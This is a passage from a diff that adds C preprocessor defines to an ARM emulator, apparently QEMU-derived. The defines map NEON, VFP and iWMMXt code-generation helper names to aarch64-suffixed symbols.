gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_aarch64 +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_aarch64 +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_aarch64 +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_aarch64 +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_aarch64 +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_aarch64 +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_aarch64 +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_aarch64 +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_aarch64 +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_aarch64 +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_aarch64 +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_aarch64 +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_aarch64 +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_aarch64 +#define gen_helper_neon_qrshl_s16 
gen_helper_neon_qrshl_s16_aarch64 +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_aarch64 +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_aarch64 +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_aarch64 +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_aarch64 +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_aarch64 +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_aarch64 +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_aarch64 +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_aarch64 +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_aarch64 +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_aarch64 +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_aarch64 +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_aarch64 +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_aarch64 +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_aarch64 +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_aarch64 +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_aarch64 +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_aarch64 +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_aarch64 +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_aarch64 +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_aarch64 +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_aarch64 +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_aarch64 +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_aarch64 +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_aarch64 +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_aarch64 +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_aarch64 +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_aarch64 +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_aarch64 +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_aarch64 +#define 
gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_aarch64 +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_aarch64 +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_aarch64 +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_aarch64 +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_aarch64 +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_aarch64 +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_aarch64 +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_aarch64 +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_aarch64 +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_aarch64 +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_aarch64 +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_aarch64 +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_aarch64 +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_aarch64 +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_aarch64 +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_aarch64 +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_aarch64 +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_aarch64 +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_aarch64 +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_aarch64 +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_aarch64 +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_aarch64 +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_aarch64 +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_aarch64 +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_aarch64 +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_aarch64 +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_aarch64 +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_aarch64 +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_aarch64 +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_aarch64 +#define gen_helper_neon_tbl 
gen_helper_neon_tbl_aarch64 +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_aarch64 +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_aarch64 +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_aarch64 +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_aarch64 +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_aarch64 +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_aarch64 +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_aarch64 +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_aarch64 +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_aarch64 +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_aarch64 +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_aarch64 +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_aarch64 +#define gen_helper_neon_zip16 gen_helper_neon_zip16_aarch64 +#define gen_helper_neon_zip8 gen_helper_neon_zip8_aarch64 +#define gen_helper_pre_hvc gen_helper_pre_hvc_aarch64 +#define gen_helper_pre_smc gen_helper_pre_smc_aarch64 +#define gen_helper_qadd16 gen_helper_qadd16_aarch64 +#define gen_helper_qadd8 gen_helper_qadd8_aarch64 +#define gen_helper_qaddsubx gen_helper_qaddsubx_aarch64 +#define gen_helper_qsub16 gen_helper_qsub16_aarch64 +#define gen_helper_qsub8 gen_helper_qsub8_aarch64 +#define gen_helper_qsubaddx gen_helper_qsubaddx_aarch64 +#define gen_helper_rbit gen_helper_rbit_aarch64 +#define gen_helper_recpe_f32 gen_helper_recpe_f32_aarch64 +#define gen_helper_recpe_u32 gen_helper_recpe_u32_aarch64 +#define gen_helper_recps_f32 gen_helper_recps_f32_aarch64 +#define gen_helper_rintd gen_helper_rintd_aarch64 +#define gen_helper_rintd_exact gen_helper_rintd_exact_aarch64 +#define gen_helper_rints gen_helper_rints_aarch64 +#define gen_helper_rints_exact gen_helper_rints_exact_aarch64 +#define gen_helper_ror_cc gen_helper_ror_cc_aarch64 +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_aarch64 +#define 
gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_aarch64 +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_aarch64 +#define gen_helper_sadd16 gen_helper_sadd16_aarch64 +#define gen_helper_sadd8 gen_helper_sadd8_aarch64 +#define gen_helper_saddsubx gen_helper_saddsubx_aarch64 +#define gen_helper_sar_cc gen_helper_sar_cc_aarch64 +#define gen_helper_sdiv gen_helper_sdiv_aarch64 +#define gen_helper_sel_flags gen_helper_sel_flags_aarch64 +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_aarch64 +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_aarch64 +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_aarch64 +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_aarch64 +#define gen_helper_set_rmode gen_helper_set_rmode_aarch64 +#define gen_helper_set_user_reg gen_helper_set_user_reg_aarch64 +#define gen_helper_shadd16 gen_helper_shadd16_aarch64 +#define gen_helper_shadd8 gen_helper_shadd8_aarch64 +#define gen_helper_shaddsubx gen_helper_shaddsubx_aarch64 +#define gen_helper_shl_cc gen_helper_shl_cc_aarch64 +#define gen_helper_shr_cc gen_helper_shr_cc_aarch64 +#define gen_helper_shsub16 gen_helper_shsub16_aarch64 +#define gen_helper_shsub8 gen_helper_shsub8_aarch64 +#define gen_helper_shsubaddx gen_helper_shsubaddx_aarch64 +#define gen_helper_ssat gen_helper_ssat_aarch64 +#define gen_helper_ssat16 gen_helper_ssat16_aarch64 +#define gen_helper_ssub16 gen_helper_ssub16_aarch64 +#define gen_helper_ssub8 gen_helper_ssub8_aarch64 +#define gen_helper_ssubaddx gen_helper_ssubaddx_aarch64 +#define gen_helper_sub_saturate gen_helper_sub_saturate_aarch64 +#define gen_helper_sxtb16 gen_helper_sxtb16_aarch64 +#define gen_helper_uadd16 gen_helper_uadd16_aarch64 +#define gen_helper_uadd8 gen_helper_uadd8_aarch64 +#define gen_helper_uaddsubx gen_helper_uaddsubx_aarch64 +#define gen_helper_udiv gen_helper_udiv_aarch64 +#define gen_helper_uhadd16 gen_helper_uhadd16_aarch64 +#define gen_helper_uhadd8 gen_helper_uhadd8_aarch64 +#define gen_helper_uhaddsubx 
gen_helper_uhaddsubx_aarch64 +#define gen_helper_uhsub16 gen_helper_uhsub16_aarch64 +#define gen_helper_uhsub8 gen_helper_uhsub8_aarch64 +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_aarch64 +#define gen_helper_uqadd16 gen_helper_uqadd16_aarch64 +#define gen_helper_uqadd8 gen_helper_uqadd8_aarch64 +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_aarch64 +#define gen_helper_uqsub16 gen_helper_uqsub16_aarch64 +#define gen_helper_uqsub8 gen_helper_uqsub8_aarch64 +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_aarch64 +#define gen_helper_usad8 gen_helper_usad8_aarch64 +#define gen_helper_usat gen_helper_usat_aarch64 +#define gen_helper_usat16 gen_helper_usat16_aarch64 +#define gen_helper_usub16 gen_helper_usub16_aarch64 +#define gen_helper_usub8 gen_helper_usub8_aarch64 +#define gen_helper_usubaddx gen_helper_usubaddx_aarch64 +#define gen_helper_uxtb16 gen_helper_uxtb16_aarch64 +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_aarch64 +#define gen_helper_v7m_msr gen_helper_v7m_msr_aarch64 +#define gen_helper_vfp_absd gen_helper_vfp_absd_aarch64 +#define gen_helper_vfp_abss gen_helper_vfp_abss_aarch64 +#define gen_helper_vfp_addd gen_helper_vfp_addd_aarch64 +#define gen_helper_vfp_adds gen_helper_vfp_adds_aarch64 +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_aarch64 +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_aarch64 +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_aarch64 +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_aarch64 +#define gen_helper_vfp_divd gen_helper_vfp_divd_aarch64 +#define gen_helper_vfp_divs gen_helper_vfp_divs_aarch64 +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_aarch64 +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_aarch64 +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_aarch64 +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_aarch64 +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_aarch64 +#define gen_helper_vfp_fcvtsd 
gen_helper_vfp_fcvtsd_aarch64 +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_aarch64 +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_aarch64 +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_aarch64 +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_aarch64 +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_aarch64 +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_aarch64 +#define gen_helper_vfp_mins gen_helper_vfp_mins_aarch64 +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_aarch64 +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_aarch64 +#define gen_helper_vfp_muld gen_helper_vfp_muld_aarch64 +#define gen_helper_vfp_muls gen_helper_vfp_muls_aarch64 +#define gen_helper_vfp_negd gen_helper_vfp_negd_aarch64 +#define gen_helper_vfp_negs gen_helper_vfp_negs_aarch64 +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_aarch64 +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_aarch64 +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_aarch64 +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_aarch64 +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_aarch64 +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_aarch64 +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_aarch64 +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_aarch64 +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_aarch64 +#define gen_helper_vfp_subd gen_helper_vfp_subd_aarch64 +#define gen_helper_vfp_subs gen_helper_vfp_subs_aarch64 +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_aarch64 +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_aarch64 +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_aarch64 +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_aarch64 +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_aarch64 +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_aarch64 +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_aarch64 +#define gen_helper_vfp_tosld_round_to_zero 
gen_helper_vfp_tosld_round_to_zero_aarch64 +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_aarch64 +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_aarch64 +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_aarch64 +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_aarch64 +#define gen_helper_vfp_touid gen_helper_vfp_touid_aarch64 +#define gen_helper_vfp_touis gen_helper_vfp_touis_aarch64 +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_aarch64 +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_aarch64 +#define gen_helper_vfp_tould gen_helper_vfp_tould_aarch64 +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_aarch64 +#define gen_helper_vfp_touls gen_helper_vfp_touls_aarch64 +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_aarch64 +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_aarch64 +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_aarch64 +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_aarch64 +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_aarch64 +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_aarch64 +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_aarch64 +#define gen_helper_wfe gen_helper_wfe_aarch64 +#define gen_helper_wfi gen_helper_wfi_aarch64 +#define gen_hvc gen_hvc_aarch64 +#define gen_intermediate_code_internal gen_intermediate_code_internal_aarch64 +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_aarch64 +#define gen_iwmmxt_address gen_iwmmxt_address_aarch64 +#define gen_iwmmxt_shift gen_iwmmxt_shift_aarch64 +#define gen_jmp gen_jmp_aarch64 +#define gen_load_and_replicate gen_load_and_replicate_aarch64 +#define gen_load_exclusive gen_load_exclusive_aarch64 +#define gen_logic_CC gen_logic_CC_aarch64 +#define gen_logicq_cc gen_logicq_cc_aarch64 +#define gen_lookup_tb gen_lookup_tb_aarch64 +#define gen_mov_F0_vreg gen_mov_F0_vreg_aarch64 +#define 
gen_mov_F1_vreg gen_mov_F1_vreg_aarch64 +#define gen_mov_vreg_F0 gen_mov_vreg_F0_aarch64 +#define gen_muls_i64_i32 gen_muls_i64_i32_aarch64 +#define gen_mulu_i64_i32 gen_mulu_i64_i32_aarch64 +#define gen_mulxy gen_mulxy_aarch64 +#define gen_neon_add gen_neon_add_aarch64 +#define gen_neon_addl gen_neon_addl_aarch64 +#define gen_neon_addl_saturate gen_neon_addl_saturate_aarch64 +#define gen_neon_bsl gen_neon_bsl_aarch64 +#define gen_neon_dup_high16 gen_neon_dup_high16_aarch64 +#define gen_neon_dup_low16 gen_neon_dup_low16_aarch64 +#define gen_neon_dup_u8 gen_neon_dup_u8_aarch64 +#define gen_neon_mull gen_neon_mull_aarch64 +#define gen_neon_narrow gen_neon_narrow_aarch64 +#define gen_neon_narrow_op gen_neon_narrow_op_aarch64 +#define gen_neon_narrow_sats gen_neon_narrow_sats_aarch64 +#define gen_neon_narrow_satu gen_neon_narrow_satu_aarch64 +#define gen_neon_negl gen_neon_negl_aarch64 +#define gen_neon_rsb gen_neon_rsb_aarch64 +#define gen_neon_shift_narrow gen_neon_shift_narrow_aarch64 +#define gen_neon_subl gen_neon_subl_aarch64 +#define gen_neon_trn_u16 gen_neon_trn_u16_aarch64 +#define gen_neon_trn_u8 gen_neon_trn_u8_aarch64 +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_aarch64 +#define gen_neon_unzip gen_neon_unzip_aarch64 +#define gen_neon_widen gen_neon_widen_aarch64 +#define gen_neon_zip gen_neon_zip_aarch64 +#define gen_new_label gen_new_label_aarch64 +#define gen_nop_hint gen_nop_hint_aarch64 +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_aarch64 +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_aarch64 +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_aarch64 +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_aarch64 +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_aarch64 +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_aarch64 +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_aarch64 +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_aarch64 
+#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_aarch64 +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_aarch64 +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_aarch64 +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_aarch64 +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_aarch64 +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_aarch64 +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_aarch64 +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_aarch64 +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_aarch64 +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_aarch64 +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_aarch64 +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_aarch64 +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_aarch64 +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_aarch64 +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_aarch64 +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_aarch64 +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_aarch64 +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_aarch64 +#define gen_op_iwmmxt_minsl_M0_wRn 
gen_op_iwmmxt_minsl_M0_wRn_aarch64 +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_aarch64 +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_aarch64 +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_aarch64 +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_aarch64 +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_aarch64 +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_aarch64 +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_aarch64 +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_aarch64 +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_aarch64 +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_aarch64 +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_aarch64 +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_aarch64 +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_aarch64 +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_aarch64 +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_aarch64 +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_aarch64 +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_aarch64 +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_aarch64 +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_aarch64 +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_aarch64 +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_aarch64 +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_aarch64 +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_aarch64 +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_aarch64 +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_aarch64 +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_aarch64 +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_aarch64 +#define gen_op_iwmmxt_subsw_M0_wRn 
gen_op_iwmmxt_subsw_M0_wRn_aarch64 +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_aarch64 +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_aarch64 +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_aarch64 +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_aarch64 +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_aarch64 +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_aarch64 +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_aarch64 +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_aarch64 +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_aarch64 +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_aarch64 +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_aarch64 +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_aarch64 +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_aarch64 +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_aarch64 +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_aarch64 +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_aarch64 +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_aarch64 +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_aarch64 +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_aarch64 +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_aarch64 +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_aarch64 +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_aarch64 +#define gen_rev16 gen_rev16_aarch64 +#define gen_revsh gen_revsh_aarch64 +#define gen_rfe gen_rfe_aarch64 +#define gen_sar gen_sar_aarch64 +#define gen_sbc_CC gen_sbc_CC_aarch64 +#define gen_sbfx gen_sbfx_aarch64 +#define gen_set_CF_bit31 gen_set_CF_bit31_aarch64 +#define gen_set_condexec gen_set_condexec_aarch64 +#define gen_set_cpsr gen_set_cpsr_aarch64 +#define 
gen_set_label gen_set_label_aarch64 +#define gen_set_pc_im gen_set_pc_im_aarch64 +#define gen_set_psr gen_set_psr_aarch64 +#define gen_set_psr_im gen_set_psr_im_aarch64 +#define gen_shl gen_shl_aarch64 +#define gen_shr gen_shr_aarch64 +#define gen_smc gen_smc_aarch64 +#define gen_smul_dual gen_smul_dual_aarch64 +#define gen_srs gen_srs_aarch64 +#define gen_ss_advance gen_ss_advance_aarch64 +#define gen_step_complete_exception gen_step_complete_exception_aarch64 +#define gen_store_exclusive gen_store_exclusive_aarch64 +#define gen_storeq_reg gen_storeq_reg_aarch64 +#define gen_sub_carry gen_sub_carry_aarch64 +#define gen_sub_CC gen_sub_CC_aarch64 +#define gen_subq_msw gen_subq_msw_aarch64 +#define gen_swap_half gen_swap_half_aarch64 +#define gen_thumb2_data_op gen_thumb2_data_op_aarch64 +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_aarch64 +#define gen_ubfx gen_ubfx_aarch64 +#define gen_vfp_abs gen_vfp_abs_aarch64 +#define gen_vfp_add gen_vfp_add_aarch64 +#define gen_vfp_cmp gen_vfp_cmp_aarch64 +#define gen_vfp_cmpe 